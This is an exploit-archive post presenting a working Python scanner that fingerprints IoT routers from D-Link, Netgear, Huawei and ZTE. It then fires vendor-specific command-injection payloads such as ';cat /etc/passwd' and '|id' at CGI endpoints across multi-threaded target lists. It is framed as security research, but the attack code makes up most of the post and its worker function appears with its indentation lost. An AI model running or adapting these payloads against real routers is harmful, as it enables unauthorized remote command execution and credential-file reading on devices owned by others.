=============================================================================================================================================
| # Title : IoT Multi-Router Auto Fingerprint Command Injection Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : indoushka |
=============================================================================================================================================
[+] Summary : This Python tool is designed to automatically identify the vendor of IoT routers through HTTP fingerprinting and attempt command-injection testing using vendor-specific payloads.
The scanner analyzes HTTP headers and response bodies to detect device signatures from common manufacturers such as D-Link, Netgear, Huawei, and ZTE. If direct fingerprinting fails, it performs firmware path probing to infer the device type.
After identifying the likely vendor, the tool selects payloads tailored to that platform and sends crafted requests to commonly vulnerable CGI endpoints (e.g., /cgi-bin/admin.cgi, /setup.cgi, /ping.cgi).
The goal is to determine whether command execution is possible by detecting indicators such as /etc/passwd content or uid= output in responses.
The scanner supports multi-threaded target processing, allowing efficient testing of large target lists. It is primarily intended for security research and vulnerability assessment of
IoT routers, helping researchers quickly identify devices that may be susceptible to command injection vulnerabilities.
Key Features:
Automatic IoT router vendor fingerprinting
Firmware path probing when fingerprinting fails
Vendor-specific payload selection
Testing of common command injection endpoints
Detection of potential remote command execution
Multi-threaded scanning for large target lists
Supports routers from D-Link, Netgear, Huawei, and ZTE
Use Case: This script can assist security researchers and penetration testers in identifying misconfigured or vulnerable IoT router interfaces that may expose command injection flaws through their web management interfaces.
[+] POC : #!/usr/bin/env python3
import requests
import sys
import threading
import queue
# Silence urllib3's InsecureRequestWarning: http_get sends every request with
# verify=False, so TLS certificates are never validated and each request would
# otherwise print a warning.
requests.packages.urllib3.disable_warnings()
# Per-request timeout in seconds, read by http_get.
timeout = 5
# Lower-case substrings that fingerprint_device looks for in the lower-cased
# response headers and body. Vendors are tried in dict order and the first
# match wins, so a short token such as "dlink" or "zte" decides before any
# vendor listed after it is checked.
SIGNATURES = {
    "D-Link": [
        "d-link",
        "dir-",
        "dlinkrouter",
        "dlink"
    ],
    "Netgear": [
        "netgear",
        "r7000",
        "wndr"
    ],
    "Huawei": [
        "huaweihomegateway",
        "hg532",
        "huawei"
    ],
    "ZTE": [
        "zte",
        "zxhn",
        "f660"
    ]
}
# Vendor-specific paths probed by detect_firmware when fingerprinting fails.
# The first path that answers HTTP 200 decides the vendor: "/login.asp" is
# listed under both Huawei and ZTE, and a device that answers 200 for any path
# is attributed to whichever vendor comes first, so this is a weak signal.
FIRMWARE_PATHS = {
    "D-Link": [
        "/cgi-bin/login.cgi",
        "/HNAP1/"
    ],
    "Netgear": [
        "/currentsetting.htm",
        "/setup.cgi"
    ],
    "Huawei": [
        "/html/index.html",
        "/login.asp"
    ],
    "ZTE": [
        "/login.asp",
        "/web_shell_cmd.gch"
    ]
}
# Command-injection probe strings keyed by vendor. attempt_exploit concatenates
# each one unchanged onto the query string of the endpoints it tries, so these
# are the substrings to look for in the probed device's request logs (possibly
# percent-encoded by the HTTP client).
PAYLOADS = {
    "D-Link": [
        ";cat /etc/passwd",
        "|cat /etc/passwd",
        ";id"
    ],
    "Netgear": [
        "`cat /etc/passwd`",
        ";uname -a",
        "|id"
    ],
    "Huawei": [
        ";ls",
        "|id",
        ";cat /proc/version"
    ],
    "ZTE": [
        ";cat /proc/version",
        "|id",
        ";uname -a"
    ]
}
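def http_get(url):
    """Fetch *url* with a GET and return the Response, or None on request failure.

    TLS certificate validation is disabled (verify=False) and the module-level
    ``timeout`` bounds each request.

    Args:
        url: Full URL including scheme.

    Returns:
        The requests.Response (any status code), or None when the request
        itself failed (connection error, timeout, malformed URL, ...).
    """
    try:
        return requests.get(url, timeout=timeout, verify=False)
    except requests.RequestException:
        # Only network/HTTP-layer failures mean "no response"; the original
        # bare except also swallowed SystemExit, KeyboardInterrupt and plain
        # programming errors, hiding them as a silent None.
        return None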
def fingerprint_device(target):
    """Guess the vendor of *target* from the substrings in SIGNATURES.

    Performs a single GET of *target* and searches the lower-cased headers
    and body for each vendor's signatures, in SIGNATURES order.

    Args:
        target: Base URL of the device (scheme and host, optional port).

    Returns:
        The first vendor key whose signature occurs in the headers or body,
        or "Unknown" when there was no usable response or nothing matched.
    """
    response = http_get(target)
    if not response:
        return "Unknown"
    header_text = str(response.headers).lower()
    body_text = response.text.lower()
    for vendor, signatures in SIGNATURES.items():
        matched = any(
            sig in header_text or sig in body_text for sig in signatures
        )
        if matched:
            return vendor
    return "Unknown"
def detect_firmware(target):
    """Infer the vendor by probing FIRMWARE_PATHS until a path answers 200.

    Issues one GET per path, in FIRMWARE_PATHS order, and stops at the first
    response with status 200. Paths shared between vendors and devices that
    answer 200 for unknown paths make this only a weak hint.

    Args:
        target: Base URL of the device.

    Returns:
        The vendor key owning the first path that returned 200, or "Unknown".
    """
    for vendor, paths in FIRMWARE_PATHS.items():
        for path in paths:
            response = http_get(target + path)
            if response and response.status_code == 200:
                return vendor
    return "Unknown"
def choose_payload(vendor):
    """Return the payload list registered for *vendor*, or an empty list.

    The returned list is the object stored in PAYLOADS, not a copy.
    """
    return PAYLOADS.get(vendor, [])
def attempt_exploit(target, payload):
    """Send *payload* through three candidate CGI endpoints and report a hit.

    For each entry in ``urls`` the payload is concatenated directly onto the
    query string and fetched with http_get. A response counts as evidence of
    command execution when its body contains "root:" or "uid="; the loop
    stops at the first such response.

    Args:
        target: Base URL of the device.
        payload: One entry from PAYLOADS for the guessed vendor.

    Returns:
        True if an indicator string was found (details are printed to
        stdout), False otherwise.
    """
    urls = [
        "/cgi-bin/admin.cgi?cmd=",
        "/setup.cgi?cmd=",
        "/ping.cgi?ip="
    ]
    for u in urls:
        # Raw string concatenation: nothing here quotes or encodes the payload.
        url = target + u + payload
        r = http_get(url)
        if not r:
            # No usable response from this endpoint; try the next one.
            continue
        # Substring check over the whole body with no baseline request to
        # compare against, so a page that echoes the query string or happens
        # to contain "uid=" / "root:" is reported as a hit (false positive).
        if "root:" in r.text or "uid=" in r.text:
            print("[+] Command Execution Possible")
            print("[+] Payload:", payload)
            print("[+] URL:", url)
            return True
    return False
def scan_target(target):
    """Run the full pipeline for one target and print progress to stdout.

    Order: fingerprint_device, then detect_firmware if that returned
    "Unknown", then choose_payload. When no payload list exists for the
    guessed vendor the target is skipped; otherwise payloads are tried in
    order until attempt_exploit reports a hit.

    Args:
        target: Base URL taken verbatim from the targets file; it is passed
            to requests unchanged, so it must carry its own scheme.

    Note: this runs concurrently in several worker threads, so the print
    output of different targets may interleave.
    """
    print("\n[*] Target:", target)
    vendor = fingerprint_device(target)
    print("[*] Fingerprint:", vendor)
    if vendor == "Unknown":
        # Second, weaker guess based on which vendor-specific paths answer 200.
        vendor = detect_firmware(target)
        print("[*] Firmware Guess:", vendor)
    payloads = choose_payload(vendor)
    if not payloads:
        print("[-] No payloads available")
        return
    for payload in payloads:
        # Stop at the first payload that produced an indicator in a response.
        if attempt_exploit(target, payload):
            break
def worker(q):
while True:
target = q.get()
if target is None:
break
scan_target(target)
q.task_done()
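def main():
    """Command-line entry point.

    Usage: ``python iot_scanner.py targets.txt`` with one base URL per line
    (blank lines are ignored). Targets are fed to a fixed pool of worker
    threads; the function returns once every target has been processed and
    every worker has consumed its None sentinel.
    """
    if len(sys.argv) < 2:
        print("Usage:")
        print("python iot_scanner.py targets.txt")
        sys.exit(0)
    target_file = sys.argv[1]  # was `file`, which shadowed the builtin
    # Explicit encoding so the result does not depend on the platform default.
    with open(target_file, encoding="utf-8") as f:
        targets = [line.strip() for line in f if line.strip()]
    q = queue.Queue()
    num_workers = 10  # one constant so the sentinel count always matches the pool
    threads = []
    for _ in range(num_workers):
        t = threading.Thread(target=worker, args=(q,))
        t.start()
        threads.append(t)
    for target in targets:
        q.put(target)
    q.join()  # blocks until every target has been task_done()'d
    for _ in range(num_workers):
        q.put(None)  # one exit sentinel per worker
    for t in threads:
        t.join()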
if __name__ == "__main__":
    # Run the scanner only when executed as a script, not when imported.
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data